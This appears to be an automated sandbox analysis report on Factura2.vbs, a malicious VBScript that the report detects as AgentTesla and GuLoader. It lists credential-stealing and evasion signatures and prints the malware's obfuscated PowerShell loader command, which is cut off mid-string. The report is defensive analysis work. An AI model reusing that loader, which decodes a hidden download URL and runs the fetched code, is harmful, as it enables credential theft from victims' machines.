Windows
Analysis Report
Factura2.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6268, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 5672, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS ,steo .and zConfoi Ve jrl ReavlP rintaB.une /Ca,ro5.ic it.Choos0S kide Lnnin (DuellW de siiMonopnW ap.kdSavan oIslanwdoe rcs Emer B romNUoverT Axopo Opri .1Allia0Fo rel.Vaing0 comb;Angr e DecorWGr aeni Femin G.in6Kurs u4Ect,c;ko tr Parenx tyede6Tri, h4taffe;Ph ary Elle,r ,uresv Kip e:,eseg1Hj emm2Hjlpe1 klogt. ign e0Prd k) H ove AlterG Dis aeJonn hcStrafkF, rudoPseud/ St,w2R vh u0Digi.1,e cir0Fersk0 nakke1K.as s0 Mese1 i eld OsphrF Klon.iFema arKlebieBr ontf S.tyo AmtsrxBort e/ Fron1Ex cla2Butto1 Publ.Sves k0Handl '; $Nuanceret =Pisseskn ' SdelURep ansMedhoeH e.lirPar a -El,vaAUka segPoca,eM agtkn divv tIodat ';$ unshady=Pi sseskn 'Xy lo.h Rabbt Halfhtmika ,pt,lles A yyu: Un,o/ Inka/D.kk edBo edrDi cari Berav Pl,caeCo.p a.Dem bg H usnoVelbeo Bann,gAnno ,lTandsede gne. Swinc Fel,oReba nmDemou/En dkkuDieumc Ad oc?Dag oeS,rtlx s adapBhakto nond r Udt rtG imr=To bacdDefrao cl.ngwVkke nWeakalFu lfioPlatoa Fo.stdStor b&KlbesiPe ssudBatte= Stv r1Oner aTSpermE,e lveIMesmen re.tJSkol euFidg.NSt opne ,rsta himmeiAbio l- TaleSCo ntrRBes.iI Barbo4 Und eC emibSup pl4Freed0 DagdUTartr 9Aeropk.el efrUdsy,lE xecu2Trave XCoemp7Ant irxHypoej MbelD,imel g reenG.or sc ';$Dous ers=Pisses kn 'T llb> Reimm ';$L aurikke=Pi sseskn 'Af pluigrlige DemorxLuck f ';$Flyve stolene = Pisseskn ' UnwoeKil. bcvibrihOp splo.ibbe mic,o%daiq uaHeroepGo ldepUd,krd Steelatum. dtOustia A ,ch%Brsli\ PorcM Shi feSinopr T ykeoMythog SkorsaSkat sGastrt T rihrIntrau Pu.sl.iun taCentr.Di gamB autoe GrammsHous e Pid.l&Gr umo&Und p Delfe Sst. cp,rtuhPig meoFrt s T oppl$Objec ';Saproph agan (Piss eskn ' Pun k$ Di ogSa valSlagbo S bubUnsc aa fluelMi sl.:OmbytA L.mbasQuee sIdioteUl empv Joure TimbrrNaad ia.usiktNo ng.iOrgann Indbrg ont i=U,ear(F attcVelsem StevedNe h u Eks m/Om skrcLetfr ota$ Vent FKern.lSci opy .igtv ReleeS,les s Snakt Tr adoU.bell Fireecoelo nTot.ee ma lt)Afspn ' );Sapropha gan (Pisse skn 'junke $ nsig App alunderoep ipabIsraea Lit.lpres u:ParitFGa vend Syfir Gra.ue ven dnNonpreRe sidh Chanj Hardme Bed rm Stil= C hil$ armu SponnPa.kl sBagflh.ed bia epowdB e,tsy.icla .Daa,esNri ngpUnexplO perci scat .ornb( dru d$ ApolDGi ftioObjeku DenatsT,ef oePhr.tr U noxsIndkr) Vel.o ');$ unshady=$F